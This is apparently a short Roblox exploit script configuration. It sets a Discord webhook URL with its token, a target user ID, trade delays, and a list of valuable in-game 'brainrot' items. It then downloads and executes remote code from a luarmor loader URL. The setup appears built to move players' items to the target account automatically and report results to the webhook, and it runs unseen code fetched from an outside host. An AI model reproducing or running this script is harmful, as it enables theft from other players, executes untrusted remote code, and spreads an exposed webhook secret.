getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1478136340745945198/EIPDREKqa4c61lfCBAq7DPmZ7BFB7RB_FpYPcsuHnOIqPc98ZBeBfQNtGvyyGJiBpT89"
getgenv().TARGET_ID = 1797504493
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["La Secret Combinasion"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Esok Sekolah"] = true,
    ["La Ginger Sekolah"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Orcaledon"] = true,
    ["Eviledon"] = true,
    ["Money Money Reindeer"] = true,
    ["Celularcini Viciosini"] = true,
    ["Headless Horseman"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["La Supreme Combinasion"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Cooki and Milki"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Los Sekolahs"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Spooky and Pumpky"] = true,
    ["Tralaledon"] = true,
    ["Los Hotspotsitos"] = true,
    ["Swag Soda"] = true,
    ["Dragon Cannelloni"] = true,
    ["Cerberus"] = true,
    ["Capitano Moby"] = true,
    ["Burguro And Fryuro"] = true,
    ["Garama and Madundung"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Tictac Sahur"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Swaggy Bros"] = true,
    ["La Taco Combinasion"] = true,
    ["W or L"] = true,
    ["Strawberry Elephant"] = true,
    ["Skibidi Toilet"] = true,
    ["Meowl"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()